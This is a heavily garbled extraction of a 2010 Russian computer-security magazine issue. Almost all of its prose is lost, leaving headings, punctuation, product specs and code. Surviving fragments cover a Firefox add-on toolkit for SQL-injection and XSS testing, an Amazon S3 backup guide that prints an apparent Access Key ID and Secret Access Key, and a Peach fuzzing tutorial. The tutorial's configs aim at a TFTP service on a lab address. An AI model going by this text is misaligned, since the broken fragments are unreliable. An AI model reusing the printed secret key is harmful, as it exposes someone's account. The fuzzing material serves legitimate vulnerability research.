
.

110

x 07 () 2010

.
210
:

WEB-

07 (138) 2010

AMAZON S3


. 26


. 52

138

LOTUS DOMINO
SKYPE



. 107

INTRO
CENSORED

-
. ,
Google,
e-mail ,
,
.
,
, ,
,
.

:


.
,
, ,
, ,

e-mail ICQ

.



. ,
VPN,

,
.
,
.
, ! :)

nikitozz, . .
udalite.livejournal.com

MegaNews

004

084

FERRUM
016

32

020

Intel


Samsung ML-1660

PC_ZONE
022
026
031
032
038

Firefox-

Mozilla

Amazon S3

10 reverse-engineering

, ,

, ,

042

Easy-Hack

046

052
058
064
068
071
076

C,

090

096
100

Qubes OS
Linux,

Linux

-x86 - Linux

104
107
110
114

Windows

C++

SYN/ACK
116
120

D-link 500T


Hyena 8.0


Cisco Systems Juniper Networks

124

...

129

ProcFS Web-

Lotus Domino

, mod_rewrite

ProcFS

- 134

ROP,

X-Tools

140

MALWARE

143

078

144

082

Skype


: AVG, AVIRA AVAST?

DrWeb

Windows *nix

nginx Web-

PSYCHO:
!

FAQ UNITED

FAQ

8.5

WWW2

web-

052

D-link 500T

078


: AVG, AVIRA AVAST?

058

104

Lotus Domino

>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>

Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
UNIXOID, SYN/ACK PSYCHO
Andrushock
(andrushock@real.xakep.ru)

Dr. Klouniz
(alexander@real.xakep.ru)
>

> xakep.ru
(xa@real.xakep.ru)

/ART

>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)

/DVD

>
Step
(step@real.xakep.ru)

Windows

> Unix-
Ant
>

/PUBLISHING
>
, 119021, , .
, . 11, . 44-45
.: +7 (495) 935-7034
: +7 (495) 780-8824
>

>

>

>

>

>

>PR-

>

>

>

/ .: (495) 935-7034, : (495) 780-8824


> GAMES & DIGITAL
(goryacheva@gameland.ru)

>




> Gameland TV

>
(strekneva@gameland.ru)
>

>


>
(ashomko@gameland.ru)
> -

>

(korenfeld@gameland.ru)
>

>

(andrey@gameland.ru)
>

(devald@gameland.ru)
>

(kosheleva@gameland.ru )

>

(goncharova@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24
>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,

,

77-11802 14
2002 .

Lietuvas Rivas, .
100 000 .
.

. :

. ,

,
.
.


.
.

:
content@gameland.ru
, , 2010

MEGANEWS

MIFRILL

MARIA.NEFEDOVA@GLC.RU

MEGANEWS

Google, ,
, , .
, Google Street View
Google
Streets. , -

. ,
Street View SSID MAC- Wi-Fi-, ,
. - : ,
Wi-Fi-,
,
Wi-Fi-.
Google, ,
. , , ,
Google. - :
. ,
.
.
, Google .
-, . -, (
, 5 ).
? Google ,
.
.

2010 ANDROID OS 28% ,


IPHONE OS 21%

PALM
, ,
Palm, , HP $1,2 .,
$5,70 . , , , ,
HP , Palm . HP ,
Palm webOS.
,
iPad, HP Slate, , Windows 7,
, webOS. , ,
webOS : HP
,
. HP Google
(Matias Duarte), Palm - , webOS.
UI- Android.

004

X 07 /138/ 10

MEGANEWS

IMAGINE CUP 2010


3 8 IT- Microsoft
Imagine Cup.
: ( Software design) (Embedded development).
,
, -,
. ,
www.imaginecup.
com, www.microsoft.com/rus/imaginecup. !

2009 -
59,7 .

,

, 1-2 , , , . , Seagate
-
: , ,

3 .
, ,

, ,
, . ,


LBA, 2,1
.
Long LBA, ,
, 64-
Win 7 Vista , Windows
XP 2,1 .


,
Theora H.264
,
.
,
.
Google,
Google I/O
WebM,
VP8, Vorbis -

Matroska. , Google On2 ,


VP3 VP8 ( ), .
, WebM , , ,


. WebM
Chromium,

Opera, Firefox (
www.webmproject.org),
YouTube, HTML5
URL &webm=1.

16384x16384,
, ,
.


,
.
Wi-Fi
,
,
.
Kindle, ,
, Barnes & Noble
Nook. ,
Android , Read


In Store - . Amazon

Kindle,
Facebook Twitter, PDF
.
,
Nook. ,
Barnes & Noble
Android, ,
: E-ink
.

MEGANEWS


LG W2363D,
3D. 23- Full HD (1920x1080), 70000:1
3 . 120- , ,
. G MODE:
Thru Mode ; RC
, ; AutoBright
; SRS Tru-surround HD
.
,
Tru-Light. Tru-Light
.
NVIDIA GeForce 3D Vision,
6000 .
17000 .

APP STORE -
BitTorrent,
- Torrent. Torrent
, ,
Apple App Store.
Torrent, Griffin.
.btapp, HTML JavaScript, . App Store
Torrent 2.2 (
). , ,
uTorrent , . , ,
, : , . , ,
.

83%



DoS-,
, . ,
- ,
,
Imperva. : Exeman
-,
300 .
GUI- (90 PHP).
DDoS .
, -
, .
,
.


MEGANEWS


IT-. 14- CEO Summit ,
Microsoft, , MS
.
,
-, ,
. ,
DRM, ,
, .

IPAD
200 000 ,

MAC

180 000

ANDROID
GOOGLE

,
.
- CyberBunker
50- . , CyberBunker
7 .
Columbia Pictures, Disney Enterprises, Paramount
Pictures, Twentieth Century Fox, Universal Warner Bros
- .
6 2010 , CyberBunker The Pirate Bay .
, CB3ROB,
, , CyberBunker ,
. , TPB , , ,
. ,
TPB !
, ,
: ,
TPB , The
Pirate Bay .

? WHOYOUGLE!
-
, . Rambler ,
WhoYOUgle (, ).
, , , ,
. ?
http://whoyougle.ru, 1- 2009
. WhoYOUgle ,
( dolboeb).
WhoYOUgle
,


100 940 --
.
.


MEGANEWS


,
,

mp3- .

,
,
- .




,
. - ,
, , ,
, ,
.


,
(
, )
0,5% . , , ,
, -
. .

$20 WI-FI


Wi-Fi .

, , Wifi Box
(wifi-box.com),
20-30 .
Made in China:
, USB- Wi-Fi,
Linux, Backtrack.
,
WEP/WPA . , kismet aircrack GUI-
Spoonwep Spoonwpa. ,
, ,
.
Backtrack , Wi-Fi
- dealextreme.com. - RTL8187L. ,
.
$20 .
, : ,
. ,
nag.ru lan23.ru.

RAPIDSHARE WINS!

20


USENET-.
1979
30

,

-

. RapidShare
,
,

.

RapidShare

.

,
, RapidShare .



RAR. - .
, Google top-1000
. Rapidshare
40- !


,

-, ,
. -, ,
,
( Coding). , , Gsou
, , . - D30 - .
,
Skype MSN.
, , ,
, , HD, .

MANDRIVA

,
Mandriva - , . ,
, .
Mandriva Linux 2008 ,
,
Mandriva
, .
, , Mandriva , ,
.
, Mandriva
,
.

3D HD
: Sharp
3D
HD-.
,
,
, ,
- . , ,
HD (720p2),
, ( ,
), 3D-.
,
,
.

MEGANEWS


Thermaltake,
, ,
, ,
! Tt eSPORTS
:
Challenger Challenger Pro.
: Challenger Pro
18 (
Challenger 12 ),
64
( 32 ),
USB 2.0 ( Challenger )
( ). ,
. ,


, :).
$55 Challenger $75
Challenger Pro.

1 300 000

GOOGLE TV
Google . Google TV,

Sony Logitech,
-. Google TV

,
-
, ( HDMI-
).

YouTube
-
Google Chrome.
Google TV ,
-,
( )
. Google
TV
.

. .
2010 LD

LD Select c . LD Select


,
, -


.
LD Select :
LD Select Red (10/0,8 /), 1 LD Select Blue (6/0,5
/) LD Select Silver
2 (4/0,4 /). LD Select ,
.
X 06 /137/ 10


,
. - , (MPA),
Usenet- Newzbin. , MPA, , . , ,
- Team R
Dogs, Newzbin . Mr.White , - .
DeepSharer .
, .
,
Newzbin, , Newzbin2
.

5 PAC-MAN,

GOOGLE 30-


ASRock H55M
Pro
MSI H55-GD65

FERRUM

MSI H55-GD65
Gigabyte GAH55M-UD2H


32
HP Pavilion
dv6t

Dell Studio
1515

S H55H-CM

ASUS P7H55-M
Pro

ASUS
M4A78T-E

ASUS
INTEL M4A78T-E

32- Westmere
Intel H55/57 Express.
, , .
.
?
, Intel
H55/H57 Express, , .
Intel H57 Express
Intel Core,
i3 i7. PCI
Express (,
), DVI,
DisplayPort ( HDCP) HDMI,
SATA, RAID, USB,
, PCI Express . Intel H55 Express H57
RAID- ,
PCI Express x1 ( ).

[Chart: BCLK by motherboard (MSI H55-GD65, ASRock H55M Pro, ASUS P7H55-M Pro, Gigabyte GA-H55M-UD2H, ECS H55H-CM, Foxconn H55MX-S)]


,
.
BCLK 214 (4922\23). , SuperPI
1.5XS 1M, wPrime 2.0 32M, Lavalys Everest Ultimate Edition.


, : 3.06, Intel Core i3-540
, : 2x2, Geil Black Dragon
, : 512, ATI Radeon HD 5670
, : 1.5, Seagate Barracuda
ST31500341AS
: Noctua NH-D14
, : 1000, ZALMAN ZM1000-HP
: Windows XP Professional, SP3, x32

ASUS
MSI

[Chart: WinRAR 3.9, stock and overclocked (OC), by motherboard (MSI H55-GD65, ASRock H55M Pro, ASUS P7H55-M Pro, Gigabyte GA-H55M-UD2H, ECS H55H-CM, Foxconn H55MX-S)]


[Charts: wPrime 2.00 32m and SuperPi 1.5 XS 1m, in seconds, stock and overclocked (OC); Everest memory read, write and copy, stock and overclocked (OC); by motherboard (MSI H55-GD65, ASRock H55M Pro, ASUS P7H55-M Pro, Gigabyte GA-H55M-UD2H, ECS H55H-CM, Foxconn H55MX-S)]

ASUS
P7H55-M PRO

4500 .

ASROCK
H55M PRO

3400 .

: INTEL H55 EXPRESS


: LGA 1156
, : 16, 4XDDR3, 1066 2133
: 1XIDE, 6XSATA 3 /
: 1XPCI-E X16, 1XPCI-E X1, 2XPCI
: D-SUB, DVI, HDMI, 6XUSB 2.0, SPDIF, RJ-45, PS/2
: 7.1 HDA REALTEK
: GIGABIT ETHERNET
-: 245X245 , MATX

: INTEL H55 EXPRESS


: LGA 1156
, : 16, 4X DDR3, 1066-2600+
: 5XSATA 3 /
: 1XPCI-E X16, 1XPCI-E X16 ( X4), 1XPCI-E
X1, 1XPCI
: D-SUB, DVI, HDMI, 5XUSB 2.0, ESATA/USB, FIREWIRE,
SPDIF, RJ-45, PS/2
: 7.1 HD VIA VT1718S
: GIGABIT ETHERNET
-: 244X244 , MATX

ASUS
Clarkdale, , ,
. ,
,
. . ,
206 , . ,
BIOS, Turbo V,
.

, ASRock
, ,
. , ASRock H55M Pro ,
.
ATI CrossFire X,
, , PCI-E
x1 PCI. ,
193 , , , ,
.

ASUS, ,
. , PCI Express x4, , , , ,
.


. , ,
. ,
.


ASUS P7H55M Pro


ECS H55H-CM

FERRUM

Samsung
R580

MSI H55-GD65

GD65
Samsung
R580
MSI H55-GD65

3500 .

2900 .

ECS
H55H-CM

FOXCONN
H55MX-S

,
. 16
4 PCI-E x1
. SATA. .

, , , ,
,
.
PCI Express x4, (
),
.

: INTEL H55 EXPRESS


: LGA 1156
, : 16, 4XDDR3, 1066/1333
: 6XSATA 3 /
: 1XPCI-E X16, 2XPCI-E X1, 1XPCI
: D-SUB, HDMI, 6XUSB 2.0, RJ-45, 2XPS/2, LPT
: 5.1 HD REALTEK ALC662 ( 7.1 REALTEK
ALC888)
: GIGABIT ETHERNET
-: 244X244 , MATX

, ,
,
PCI Express x1 . , , : BIOS
,
BCLK,
. 160 ,
,
.


: INTEL H55 EXPRESS


: LGA 1156
, : 8, 2XDDR3, 1066/1333
: 6XSATA 3 /
: 1XPCI-E X16, 1XPCI-E X4, 2XPCI
: DVI, HDMI, 6XUSB 2.0, SPDIF, COM, RJ-45, PS/2
: 7.1 HDA REALTEK ALC888S
: GIGABIT ETHERNET
-: 244X218 , MATX


. , -
mATX, ,
, 8 .
, BIOS
,
. ,
.

5ASRock H55M Pro

MSI H55-G
Gigabyte GAH55M-UD2H

Gigabyte GAH55M-UD2H
MSI H55-GD65

3600 .

GIGABYTE
GA-H55M-UD2H
:

: INTEL H55 EXPRESS


: LGA 1156
, : 16, 4DDR3, 800 2200+
: 1XIDE, 1XFDD, 5XSATA
: 2XPCI-E X16, 2XPCI
: D-SUB, DVI, HDMI, DISPLAYPORT, 6XUSB 2.0,
FIREWIRE, SPDIF, ESATA, RJ-45, PS/2
: 7.1 HD REALTEK ALC889
,: GIGABIT ETHERNET REALTEK RTL8111D
-: 244X230 , MATX

, , , DDR3
2133 . Intel Core i5 i7, , 1066 . ,
ATI CrossFire X,
. , Ultra
Durable 3,
.

, ,
,
165 , Gigabyte . , FPS
, .


4500 .

MSI
H55-GD65
:

: INTEL H55 EXPRESS


: LGA 1156
, : 16, 4XDDR3, 1066-2133+
: 1XIDE, 7XSATA
: 2XPCI-E X16, 2XPCI-E X1, 2XPCI
: D-SUB, DVI, HDMI, 6XUSB 2.0, FIREWIRE, SPDIF,
ESATA, RJ-45, 1XPS/2
: 7.1 HD REALTEK ALC889
: GIGABIT ETHERNET, REALTEK 8111DL
-, : 305X225, ATX

- ATX, , ,
eSATA, ,
. , .
.
4876 ,
. ,
,
.


. , .


FERRUM

4490 .



SAMSUNG ML-1660

,
. , ,
.
, . . , .
Samsung ML-1660,
. . . .


, dpi: 1200x600
, \: 16
, : 8
, : 150
, : 321x224x181
, : 4.2


,
:
, , .
, .
10
.
, ,
, .

, ,
. Samsung ML-1660
. , ,
. .
,
,
, .
, , . , ,
. ,
, ,
, , ,
, .
, . ,
- .

, , Samsung ML-1660
,
. . \
: , ,
, (
),
.


,
. , , ,
,
. , !
Samsung AnyWeb Print,
.
.
- ,
Print!
, ,
.

, Samsung ML-1660 , , . ? -
. 10
45,6 ,
8 ,
.
, ,
, .
,
, , - ,
. ,
,
. .
,
.
ML-1660, - , , .

Samsung
.
, ,
, . ,
.
. z


PC_ZONE
Step step@glc.ru

FIREFOX-

Mozilla

, Firefox' . : , -, .
,
, .

,
: ,
.
x-toolz

. ,
HTTP-, ,
User-Agent, fingerprinting ,
,
. .

FINGERPRINTING' FIREFOX'


: , , .
,
,
. CMS/
/, -


, , . ,
,
.
. , <meta
name="generator" content="WordPress 2.8.4"
/> ,
Wordpress'.
,

Wappalyzer. , ,
, ,

. .
Wappalyzer
,
, , -, .

JS-
( Google
Analytics).
,
.
ShowIP
, IP-
, ,
whois.

HTTP-

,
, ,
. HTTP/HTTPS-
-, Fiddler'.
, ,

Wappalyzer

HTTP-

, .
HttpFox Live
HTTP Headers.

HTTP-,
, ,
POST- .. ,


. : Modify Headers
, , ,
.
User Agent ,
, HTTP- ,
. ,
, User Agent Switcher,
.
Tamper Data
,
.
, POST-.
,
GET,
URL,

. POST
,
, , . , Tamper Data
VisualHack'.
,
. ,


. ,
GET- POST-
Fireforce. ,
,
, ,
, .
,
?
FuzzyFox .

, - .
, ,
,
.
,
. , , Firefox
cookies,
( ). , Add N Edit Cookies,


. ,

,
, Allcookies
.

CookieSwap. ,

,
. , ,
,
Google ,
, Gmail.

JS-

Gmail, Facebook
-,
JavaScript.
, , , . ,
Firefox
Javascript Firebug.

JS , ,
JS-. Firebug

, , .
if-breakpoint',
.
,
, .


?
Firefox ,
. , -
, . Firefox'
: ,
3.5, 3.6.3 .
, ? Nightly
Tester Tools.
- ,
.


PC_ZONE

POST-

User
Agent
, ;
watch'. ,
- ,

. Firebug Firefox


JS-, HTML-,
CSS .
Inspect,
,
Firebug ,
.

,

View Dependencies.
, , JS/CSS-.
(-,
JS- JS- )
, , .

, , -,
( JavaScript), , -,

.


, ,
. ,
JavaScript
Deobfuscator.
, JS-
,
, ( ) .
Tools
,
/.

, XSS,


XSS-, SQL
,
Firefox' HackBar. ,


,
. HackBar
, ,

. SQL-,
SQL Injection. ,
SQL-,
, ,

.
SQL Inject Me, security- Seccom

SQL-

Labs. ,
,
( ) ,
.
.
XSS XSS Me. HTML-,

,
XSS-. HTML-
JS- (document.vulnerable=true),

XSS.

FLASH-

Flash, .
SWF- , -
.
Flashbug, Firebug' SWF-,
. Firebug' ,
, AMF-, , ( , )
Flash ActionScript.

Firebug

JS-


FireFlash
ActionScript , ,
, XML Flash-, Firebug console.
,
,
SWF-, , . Firebug,
Firefox , .

,
.
.
,
IP. ,
, IP:
Google Voice, Pandora Radio ..
. ,
,
, FoxyProxy.
,
,
.
,
. , , ,
, . Tor, Firefox'
Torbutton,
.
,
FireGPG.
, , , Gmail,
GnuPG.
Tracking-,
(,

). ,
,
.
Flash-cookies,
LSO- (Local Shared Objects) - ,
, ,
.
? Tracking-
BetterPrivacy.

NoScript. .
, ,
XSS Clickjacking :). ,
JS, Java Flash
, .
Firekeeper,
IDS- Snort.

DVD
dvd


DVD-.

][-


,
.
,
(,
) , ,
,
. Greasemonkey, . ,
, ,
-
.

userscripts.org.
.
,
. iMacros, TestGen4Web,
Chickenfoot.
? ,


PC_ZONE
Step step@glc.ru

Amazon S3



.
. . , .

Twitter .
.


-
,

-
s3.amazonaws.com.
, Amazon
S3. :
,


Dropbox (www.dropbox.com) ,

, Amazon S3? , , !
,

, 99.9%
.
.
.


,
, . ?
flickr .
, -
,
. .
, ,
?
,


bucket' .
.
.

S3Fox
,
.
,
, ,
?
, DVD,
:
. ,
,
,
Amazon S3. .

S3?

Amazon S3 Amazon
Simple Storage Server
Amazon. ,
.
,
?, , .
.
. (,
SCSI).
. ,

, ...
.
-,
, 10
36.6-. , , ,
-
. ,
, ,
.
Amazon S3.
, . 10 , 1
5000
(,
5 ). Amazon ,
.
, - , ,

Google
, . , Amazon S3
. .
, S3
,
. ,
S3
,
. ,
.
? :
99.99% ;
99.999999999% .
, . , , Amazon
S3. .
, .

, Amazon S3 ,
, .
,
.
(
- ) , .
Amazon :
, . 50
$0.150. 4.5
! ,
( ),

($0.01 1000 ). ,
,
(calculator.s3.amazonaws.com/calc5.
html). ,

Access Key ID Secret Access


Key S3-
Amazon S3 (

), .
20 , 5 ,
(
5 ). PUT/COPY/POST/
LIST 5 ,
GET. ,
Add to bill .
,
,
99.99% , $3.66
, 100 .

. ,

: S3
,
cloud-storage . ,
,
,
,
S3. ,
,
! .

Reduced Redundancy
Storage (RRS).
S3,

. , , ,
- -


PC_ZONE

. ,

.

400 (!) ,
. (
),
. ,
Amazon S3 , ,
.
:

, ,
.


, . ,
, :
Sing up for Amazon S3
aws.amazon.
com/s3.
- - Amazon ( ,
, Radar-
, ),
.
. ,
Amazon' , S3,
Amazon Web Service (AWC).
, ,
. ,
, , Visa
Mastercard. : ,
: Webmoney, .
. ,
.
:
,
. : ,
(
,
cvv2- ).
Visa Virtuon 200
,
, . ,
Visa ,
:). Amazon
,
,
.
: , ?.
.
,

. .



,
.
.

,
, S3
,
. Amazon .
: ,
FTP- SSH-
. Amazon S3
key-based .
, ,
, , .

bucket' S3,

.
, . , scanner.zip
xtoolz,
S3 xtoolz/
scanner.zip.
, bucket'. Bucket

Amazon S3,
.
bucket
Amazon S3,
bucket' . , xtoolz/scanner.zip
bucket' xakep, , URL http://xakep.s3.amazonaws.
com/xtoolz/scanner.zip.
bucket' ,
.

,


bucket'. ,
http://xakep.s3.amazonaws.com/xtoolz/scanner.
zip,
All.
REST SOAP,
( ).
: bucket,
(
bucket), (
HTTP BitTorrent ),
, (
,
).
,
. S3
, .
, ,
,

.

bucket'
, , ?
.
Firefox S3Fox (addons.mozilla.org/en-US/
firefox/addon/3247):
.
,

. email Amazon
. S3
, .

Access Key ID Secret Access Key (

INFO

info

Amazon S3


Dropbox
. 2

,
5 ,

.

CloudBerry Explorer

). ,
Security Credentials,

(aws.amazon.com/account). :

. ,

. , Amazon S3 , , .
, ,
... .
RRS, .
,
CloudBerry Explorer (cloudberrylab.com).

Access Key ID: AKIAIEAXASBKAUVBX3DQ


Secret Access Key: 6Xr1nEFZ5jWVtPc7wU6AubHe
bTW54Ue0dWV4dCa0

, S3Fox,
, , . S3Fox,
:
, .
, , bucket.
.
bucket
,
.
, URL ,
URL
. . ,
.
, .
- Copy URL (http://xakep.
s3.amazonaws.com/xtoolz/scanner.zip). :
AccessDeniedAccess Denied31D32B892AF10B41tDO
SXPdDmixz7CkanMA1GoYbaBhgcTjQy8l93OqTNsXXJqm
j3snzF2fOdlAQJvQ9

. (Edit ACL)
. S3Fox


HTTP://WWW
links


Amazon S3:
www.s3fm.com

, . S3-.
-, :
Amazon S3,
. -, ,
( S3Fox
!). ,
: ,
,
S3.
-, CloudBerry Explorer
bucket' Amazon S3.
,
. ,
( S3Fox, ).
-,
Amazon S3.
ACL- . , , BitTorrent (
generate bittorent url).
Torrent'.
Amazon S3, ,


PC_ZONE

.torrent-
,
, : s3cmd --configure.
, , .
. , s3cmd
rsync,
:
s3cmd --acl-private --bucket-location=EU --guess-mime-type --delete-removed sync /local/backup/ s3://xakep/backupfromserv1

S3-
.
,
. ,

,
. :
CloudBerry Explorer . ,
,
. ,
$40, . -,
, Amazon S3.
, -,
Powershell-
.
c:\
workdata bucket xakep,
,
(2010_06_01
):
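# $key and $secret must already hold the Access Key ID and Secret Access Key
# Folder name built from the current date, e.g. 2010_06_01
$new_folder_format = Get-Date -uformat "%Y_%m_%d"
# Open the S3 connection
$s3 = Get-CloudS3Connection -Key $key -Secret $secret
# Create the dated folder inside the bucket "xakep"
$destination = $s3 | Select-CloudFolder -path "xakep" | Add-CloudFolder $new_folder_format
# Local source folder
$src = Get-CloudFilesystemConnection | Select-CloudFolder -path "c:\workdata\"
# Copy everything from the source into the new folder
$src | Copy-CloudItem $destination -filter "*"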

.
,
S3 . CloudBerry Explorer
, ,
, CloudBerry
Online Backup.
S3 Backup (www.maluke.com/software/
s3-backup), , .

,
.
S3
5 . , ,
.

S3 LINUX

,
.
s3- s3cmd
(s3tools.org/s3cmd). Ubuntu
, : apt-get
install s3cmd.
, , -

--acl-private ,
.
--bucket-location=EU
( ,
). --guess-mime-type
, MIME-
,
.
S3-, ,
--delete-removed. , .
,
? :
s3cmd sync s3://xakep/backupfromserv1 /local/backup/

,
bucket', ls:
s3cmd ls s3://xakep

, bucket xakep
. ,
s3tools:
s3cmd --acl-private --bucket-location=EU mb s3://xakep

cron
,
. ,
?
, . z

PC_ZONE
STEP TWITTER.COM/STEPAH

10 REVERSE-ENGINEERING

, ,
, W32Dasm.
, . 2000 , W32Dasm
Turbo Debugger .
, .
SOFTICE. ,
,
, SoftICE.
, NuMega,
, , . ,
, OllyDbg (www.ollydbg.de) WinDbg (www.
microsoft.com). , ,
SoftICE ,
, .
: 2000-
UNICODE
.
OllyDbg
, , ,
UNICODE 2.0
, -.

.
if-else
. ,

, .
,
,
.

IDA Pro 4.17 ( 2001 ), , 5.0,
.

PYTHON' . , 2000
,
. Python SWIG , Python
Python' API.
IDAPython (d-dome.net/idapython)
IDA Pro,
IDA API Python.
PyDbg (pedram.redhive.com/PyDbg)
pefile (code.google.com/p/pefile).
Python -
, , IDA Pro
Immunity Debugger BinNavi,
Python.
.
-
:
,
- , .
,
.

- BinDiff (www.
immunitysec.com/products-bindiff.shtml).
,
: ,
,
A
B,

.

.
2000- ,
. 2007
IDA Pro Hex-Rays (www.hex-rays.com),
, -,
.


ARM,

.
.

,
.

,
.
CollabREate
(www.idabook.com/collabreate) IDA
Pro BinCrowd (bincrowd.zynamics.
com).
, SaaS,

, ,
.
?
. 2020
,
, :). z


PC_ZONE
Step twitter.com/stepah

,
,
,
,

CanSecWest PWN2OWN
.
. , , .
-,
.

Fuzzing 1988
The Fuzz Generator,
.



, ,
.

.
: ,
,


, ,
-
.
, ActiveX- , ,
SWF-.


.

,
, -

.
, , .
, ,
. JPEG- ,
:
?. , ,
,
, .
, ,

miniFuzz dumb-
Microsoft

Adobe Reader 9.2.0 ,


Charlie Miller

.
,

. ,

:
JPEG-, .
, ,
.
, ,
,
. ,
,
, .
,
:
(dump)
.
, ,

,
.
(smart)
.
, ,
, , , .
, , ,
.

,

SDL (Security Development Lifecycle),
Microsoft

,
fuzz-. Minifuzz
; , ,
(, winword.exe test_sample.
doc).

,
Template files,


MiniFuzz (www.microsoft.
com). Microsoft
.

PC_ZONE


PeachPit

,
.
Start Fuzzing,
,
( Aggressiveness)
.
( 2 ), ,
.
,
.
(!), ,
-, -,
, , -, crash-
.
Minifuzz Visual Studio,
fuzz-
Tools
MiniFuzz. , - MiniFuzz ,
dumb FileFuzz (labs.idefense.com/
software/fuzzing.php),
Microsoft, security-
iDefense Labs.

MiniFuzz (
) dump-,
Peach (peachfuzzer.com, ),
smart,
, .


,
.

PeachPit ( ) XML-,
, ,
.
Minifuzz, Peach
, , RPC,
COM/DCOM, SQL-
. ,
.
: ,
,
. ,
Peach ,
, . WinDBG
,
Wireshark Winpcap,

.
Peach'
PeachPit. ,
XML- ,
,
, .

Visual Studio, PeachPit',
.
-

.
,
- template.xml,
.
PeachPit' .
,
( , ..),
.
TFTP
(Read).
RFC, :
TFTP PACKET
------------------------------------------
| \x00\x01 | Filename | 0 | Mode | 0 |
------------------------------------------

, HEX \x00\x01,

. Filename
Mode . ,
,
Filename.
PeachPit' RFC:
<DataModel name="tftprrx">
  <Blob name="opcode" valueType="hex" value="00 01" token="true"/>
  <String name="filename" value="filename.txt" nullTerminated="true"/>
  <String name="mode" value="NETASCII" token="true" nullTerminated="true"/>
</DataModel>

,
.
token="true"
, Peach,
, . ,
,
filename, ,

(, , ).
, . filename mode
nullTerminated, ,
-. ,

(blob string).
, .
, ,
.
, ,
,
PeachPit'. ,
filename, .
Peach',
(Action type="output"),
tftprrx:
<StateModel name="state1" initialState="Initial">
  <State name="Initial">
    <Action type="output">
      <DataModel ref="tftprrx"/>
    </Action>
  </State>
</StateModel>


. .
-
,
( ,
).
,
(Exploitable, Probably Exploitable, Probably Not
Exploitable, Unknown),
WinDBG !exploitable (msecdbg.codeplex.com).
, TFTPD32 UDP-,
69 (TFTP):
<Agent name="RemoteAgent" location="http://192.168.1.10:9000">
  <Monitor class="debugger.WindowsDebugEngine">
    <Param name="Service" value="TFTPD32" />
  </Monitor>
  <Monitor class="network.PcapMonitor">
    <Param name="filter" value="udp port 69" />
  </Monitor>
</Agent>

.
, ,
secuiryt- .
( filename), , . ,
.

DVD
dvd


DVD-.

WARNING

warning
.



. ,

.


PC_ZONE

IOCTL Fuzzer

<Test name="tftprrx">
  <Agent ref="RemoteAgent"/>
  <StateModel ref="state1"/>
  <Publisher class="udp.Udp">
    <Param name="host" value="192.168.1.10" />
    <Param name="port" value="69" />
  </Publisher>
</Test>

publisher ,
.
TFTP UDP,
. ,

(Run). ,

:
<Run name="DefaultRun">
<Logger class="logger.Filesystem">
<Param name="path" value="logs"/>
</Logger>
<Test ref="tftprrx"/>
</Run>
</Peach>

Peach'
, .
,


?
.
,

TFTP (, write), ,
XML- .

PeachPits' peachvalidator.pyw.
,
Peach:
peach.py -a
peach.py tftpfuzzer.xml

,
XML-.

,
,

. , , .


Ring0. ,
, (
, ) . , ,

: ,
, ,
IRP-. I/O request
packets (IRP) ,
Windows

. ,
,
. ,
,

.

IOCTL Fuzzer (code.google.
com/p/ioctlfuzzer),
fuzzing-,
IRP-.
( ,

),
NtDeviceIoControlFile,

IRP-
. , IRP-

.
IRP,

. IRP-
, .
, -,

XML-,
. ,
.

.
IOCTL Fuzzer
- ,
BSOD,
:).

,
.
Microsoft,

WinDbg,
, .
VMware WinDbg
(named pipe), .
1.
VMware.
Settings Configuration Editor,
(Add), Serial Port,
Next,
Use named pipe

(\\.\pipe\com_1). This end is server. The
other end is application
Advanced, Yiled
CPU on poll ( ).
. boot.
ini ( ,
Windows XP)
, /
debugport /baudrate:
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional - Debug" /fastdetect /debugport=com1 /baudrate=115200


,

. ,


:
windbg -b -k com:pipe,port=\\.\pipe\com_1,resets=0

IOCTL Fuzzer
, BSOD
.
,

( ,
, ,

).
(
WinDbg F5),
,
, (crash
dump) . :
, , .
, :).

-?


web-based
,
HTTP -
-.


-,

(PDF-
).
,
Sulley (code.
google.com/p/sulley),
Blackhat' 2007 . ,
,

.

,
Peach, XML-,
Python.
SPIKE (www.immunitysec.
com/resources-freesoftware.shtml),
,
C.
ActiveX, COM-
. .
,
:


.
,
,

. z


PC_ZONE

-, , :
, - HTTPS, - IM-. .
: ,
- ? ,
.
GMAIL


The Bat!,
.
PGP
.
, , Gmail
-,
,


. , Google :

HTTPS , ,
. ,
Browser connection
Always use https. ,
, -
Wi-Fi,

Gmail ,
, PGP/GPG.
-, Firefox',

FireGPG (ru.getfiregpg.org/s/install). ,
PGP
: (private)
(public), ,

Firefox

,
. ,

,
, .
.
FirePGP ,
- Gmail
GnuPG,
. ,
:
Windows: gpg4win (www.gpg4win.org/
download.html);
Linux': GnuPG (www.gnupg.org/download/
index.en.html);
MacOS: Mac GPG (macgpg.sourceforge.net).
, ,
Firefox .
, ,
, ,
.
Gmail FirePGP Gmail, .
Gmail
. ,

PGP/GPG .
Gmail ,
,
. Gmail
-,
POP/IMAP/SMTP.

, , :
PGP, ,
. ,
,
.

Jabber' (
).
ICQ? ,
, , ,
SSL. , ,
? ,
-
.
. ,

SOCKS-,

.


SOCKS-. ,
(
- : miranda, qip, pidgin
..) .
,

SOCKS-. , SimpLite
(www.secway.fr). ,
,
- ,

.
,
,
,
ICQ. OTR Off-the-Record
Messaging AES,
-
- SHA-1.

IM-
,
.
PGP .
, : .

,
AES-
Message Authentication Codes (MACs).
(

), ,
.
www.
cypherpunks.ca/otr OTR localhost AIM proxy
IM- ,
. (
, macos)
, ,
IM- ( ).


PC_ZONE

!

OTR




SOCKS5 (127.0.0.1:1080) HTTP-
(127.0.0.1:8080).

ICQ- OTR, Proxy
.
ICQ-
,

.
,

( OTR fingerprint)

uin-fingerprint .
fingerprint
, ,
, . , ,
, . ICQ OTR, .

, , ,
.
, ,
.
,

.


OTR .
Pidgin' ,
Miranda quitIM ,
Mac' IM- Adium
.
OTR
, Miranda
SecureIM,
AES192, GPG/PGP.
, Miranda GPG/
PGP ,
GnuPG Plugin (addons.miranda-im.org/details.
php?action=viewfile&id=3485).
,
.

JABBER & PGP


, ,
,

. ,
XMPP (Jabber).
, XMPP
SSL/TLS- , .
, , , PGP/
GPG.
PGP GnuPG, .

XMPP- psi (www.psiim.org).
GnuPG Pidgin
.
GnuPG
FireGPG,
,
